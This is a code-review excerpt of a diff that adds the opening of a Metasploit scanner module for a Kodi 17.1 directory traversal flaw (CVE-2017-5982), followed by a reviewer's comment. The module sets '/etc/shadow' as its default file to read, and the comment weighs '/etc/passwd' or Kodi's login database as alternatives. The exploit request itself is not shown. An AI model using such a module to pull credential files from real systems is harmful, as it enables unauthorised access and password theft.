modules/auxiliary/scanner/http/kodi_traversal.rb

```diff
@@ -0,0 +1,84 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Kodi 17.1 Local File Inclusion Vulnerability',
+      'Description'    => %q{
+        This module exploits a directory traversal flaw found in Kodi 17.1.
+      },
+      'References'     =>
+        [
+          ['CVE', '2017-5982'],
+        ],
+      'Author'         =>
+        [
+          'Eric Flokstra',  #Original
+          'jvoisin'
+        ],
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => "Feb 12 2017"
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),
+        OptString.new('FILE',      [true, 'The file to obtain', '/etc/shadow']),
```

Comment:
per @void-in if this is typically run as root this line is fine.  If not, maybe it should be /etc/passwd, or the file (db) with the logins for kodi